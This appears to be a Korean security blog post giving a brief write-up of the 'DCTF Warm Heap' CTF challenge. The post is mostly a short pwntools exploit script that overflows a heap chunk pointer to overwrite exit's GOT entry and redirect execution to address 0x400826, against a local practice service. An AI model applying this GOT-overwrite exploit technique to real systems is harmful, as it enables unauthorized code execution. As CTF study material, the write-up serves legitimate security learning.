Notice
Recent Posts
Recent Comments
Link
«   2025/04   »
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30
Tags
more
Archives
Today
Total
관리 메뉴

cdor1's lab

DCTF Warm Heap 본문

Security/Pwnable

DCTF Warm Heap

Cdor1 2016. 11. 4. 05:38

후기 : s0ngsari형님의 블로그를 구경하다가 재미있어보이는 힙 문제들이 많아 나도 풀어보려고 했다.

malloc청크의 포인터를 덮어쓰는 문제였다.

컴돌이의 힙알못 탈출기 시작합니다~




from pwn import *
s = remote('localhost', 4000)

elf = ELF('/home/cdor1/pwnable/exp100')

exit_got = elf.got['exit']
dest = 0x400826

pay =  'A'*40
pay += p64(exit_got) + '\n'
pay += p64(dest)

s.sendline(pay)
s.interactive()

'Security > Pwnable' 카테고리의 다른 글

DEFCON22 Quals babyfirst-heap  (0) 2016.11.10
WITHCON malloc  (0) 2016.11.07
how2heap 번역본  (0) 2016.11.03
YISF2016 Final pwnable  (2) 2016.10.01
ARM architecture  (0) 2016.09.26
공유하기 링크
'Security/Pwnable' Related Articles more
Comments